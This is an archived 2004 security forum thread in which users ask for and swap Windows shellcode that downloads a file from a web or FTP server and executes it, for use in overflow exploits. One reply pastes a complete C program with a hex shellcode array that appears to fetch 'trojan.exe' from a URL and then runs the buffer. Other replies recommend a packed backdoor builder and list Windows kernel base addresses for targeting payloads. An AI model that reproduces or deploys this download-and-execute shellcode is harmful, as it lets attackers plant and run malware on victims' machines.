Specific Shellcode

GovernmentSecurity.org > The Archives > General Network Security

vnet576

Feb 10 2004, 09:54 PM

I'm looking for a specific shellcode that will download a file from an ftp or http server (don't remember) onto a system and execute it. I remeber seeing that shellcode in a previous exploit thats why I know that it exists..just don't remember which one. If anybody knows which one I'm talking about lemme know...also if possible documentation for that specific shellcode.

boshcash

Feb 10 2004, 09:57 PM

see http://www.metasploit.com i think it has something like this ..

vnet576

Feb 10 2004, 10:11 PM

QUOTE (boshcash @ Feb 10 2004, 04:57 PM)

see http://www.metasploit.com i think it has something like this ..

Yeh I already checked that site..the first one seemed like what I wanted at first but the shellcode isn't designed for ftp since it doesn't have anything built in to handle the ftp protocol..no user/pass support, etc. Nor does it look like it downloads from http servers either...

Perhaps I'm wrong on this one, here is the asm script to the one that is supposed to download a payload:

http://metasploit.com/sc/win2000_vampiric_connector.asm

sPiKie

Feb 10 2004, 10:13 PM

If im not rite you can go and visit http://www.elitehaven.net, a cool guy.. He uses HTTP, to download ncat.exe and execute it with some parameters

vnet576

Feb 10 2004, 10:19 PM

QUOTE (sPiKie @ Feb 10 2004, 05:13 PM)

If im not rite you can go and visit http://www.elitehaven.net, a cool guy.. He uses HTTP, to download ncat.exe and execute it with some parameters

Thanks..the guy has some cool shellcodes. The My Generic URL Download + Exec. ShellCode For WinXP seems to be what I'm looking for, gonna try it out.

sPiKie

Feb 10 2004, 10:33 PM

Peter Winter Smith, he is a respected man.. I have sent/recieved alot of mails from him

He is a sort of friend

Btw, my MyDoom.A Upload/Exec tool thread got a kinda "overflow"

ipc$hacker

Feb 11 2004, 05:36 AM

QUOTE (vnet576 @ Feb 10 2004, 10:19 PM)

QUOTE (sPiKie @ Feb 10 2004, 05:13 PM)

If im not rite you can go and visit http://www.elitehaven.net, a cool guy.. He uses HTTP, to download ncat.exe and execute it with some parameters

Thanks..the guy has some cool shellcodes. The My Generic URL Download + Exec. ShellCode For WinXP seems to be what I'm looking for, gonna try it out.

does this works finally ?

basepart

Feb 12 2004, 01:46 AM

hi,
If I geting this right, have you ever tried winshell ?
it's an old one but it's one my favorites.
i use it since a year and I like it cos its's pretty stable.
The main program producing an exe file (server) with your prefered settings built in (password, port, service name, reg key name, file to download and execute from a web server while start, etc).
The server file is around 13300 bytes big, upxed and morphined.
Maybe you want to take a look at it.

http://www.janker.org/zuopin/winshell.zip

Lusty

Feb 12 2004, 08:48 AM

Yeah.. I'll take a look at it... Wanna see if I can make it work

karate

Feb 12 2004, 11:41 AM

he is not requesting a backdoor like winshell, but a shellcode..

dunnno if it works, but i have that is my saves:

QUOTE

int main ()
{

// Generated by Hex Workshop
// essai5.exe - Starting Offset: 4102 (0x00001006) Length: 247 (0x000000F7)

unsigned char rawData[] = {
"\xEB\x72\x6A\x30\x5B\x64\x8B\x03\x8B\x40\x0C\x8B\x48\x0C\x8B\xC1"
"\x8B\x5C\x24\x08\x8B\x70\x30\x03\x74\x24\x04\x38\x1E\x75\x4C\x8B"
"\x40\x18\x8B\x58\x3C\x03\xD8\x8B\x5B\x78\x03\xD8\x8B\x73\x1C\x03"
"\xF0\x56\x8B\x73\x24\x03\xF0\x56\x8B\x53\x20\x03\xD0\x8B\x5B\x18"
"\x4B\x8B\x34\x9A\x03\xF0\x03\x74\x24\x14\x8B\x36\x3B\x74\x24\x18"
"\x74\x0A\x4B\x23\xDB\x75\xEA\x58\x58\x33\xC0\xC3\x5F\x33\xC9\x66"
"\x8B\x0C\x5F\x5F\x8B\x3C\x8F\x8D\x04\x07\xC3\x8B\x18\x8B\xC3\x3B"
"\xC1\x75\x9D\xC3\xEB\x7C\x33\xDB\x68\x79\x45\x78\x41\x6A\x0A\x6A"
"\x4B\x53\xE8\x7B\xFF\xFF\xFF\x33\xC9\x51\x68\x75\x72\x6C\x6D\x66"
"\xC7\x44\x24\x04\x6F\x6E\x8B\xEC\x51\x51\x55\xFF\xD0\x68\x69\x6C"
"\x65\x41\x6A\x0E\x6A\x72\x6A\x02\xE8\x55\xFF\xFF\xFF\x33\xDB\x53"
"\x68\x61\x2E\x65\x78\xC6\x44\x24\x04\x65\x8B\xCC\x53\x53\x51\xFF"
"\x75\x18\x53\xFF\xD0\x33\xDB\x68\x69\x6E\x45\x78\x6A\x01\x6A\x4B"
"\x53\xE8\x2C\xFF\xFF\xFF\x8D\x4C\x24\x10\x6A\x01\x51\xFF\xD0\x33"
"\xDB\x68\x78\x69\x74\x50\x6A\x01\x6A\x4B\x53\xE8\x12\xFF\xFF\xFF"
"\xFF\xD0\xE8\x7F\xFF\xFF\xFF"
"http://www.chez.com/mvm/trojan.exe"
} ;

void (*shellcode) () = ( void * ) rawData;
shellcode ();

return 0;
}

please report your test, and post the shellcode you like if you test and found it!

vnet576

Feb 12 2004, 08:09 PM

The shellcode from elite haven works well. It says that its for windows xp only, but I don't have win2k or 2k3 to see if it'll work on those as well. I also found another program that automates the process. The advantage of this is that it automatically compiles and converts the shellcode to hexadecimal format. Other than that they both work well.
http://www.delikon.de/zips/shellcode-v2.0.zip

Basepart, thanks but that program is not a shellcode. Its still a good prog though.

I'll test u're shellcode out karate and I'll reply if it works.

karate

Feb 12 2004, 11:47 PM

Thx vnet576, interesting infos

zero-maitimax

Feb 16 2004, 11:19 AM

what for a shell are you coding for??

vnet576

Feb 17 2004, 12:19 AM

QUOTE (zero-maitimax @ Feb 16 2004, 06:19 AM)

what for a shell are you coding for??

Just getting the basics of incorporating differnt types of shellcodes into different exploits. No nothing as complicated as ASN, just very basic overflow exploits with different shellcodes.

karate

Feb 17 2004, 08:04 PM

http://www.harmonysecurity.com/kungfoo.html

explioan tha pincipe of a total compatible shelcode, but the project is still on devlopement

looks like shellcode have to be specific to OS version!

Windows Version
Kernels Base Address
Win95
0xBFF70000
Win98 (1st and 2nd editions)
0xBFF70000
WinME
0xBFF60000
WinNT (service pack 4 and 5)
0x77F00000
WinXP

0x77E60000
Win2K (service pack 1,2 and 3)

0x77E80000
Win2003 Web Edition
0x77E40000

isn't there somwhere a universal shellcode for all windows versions (that download and execute...)

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.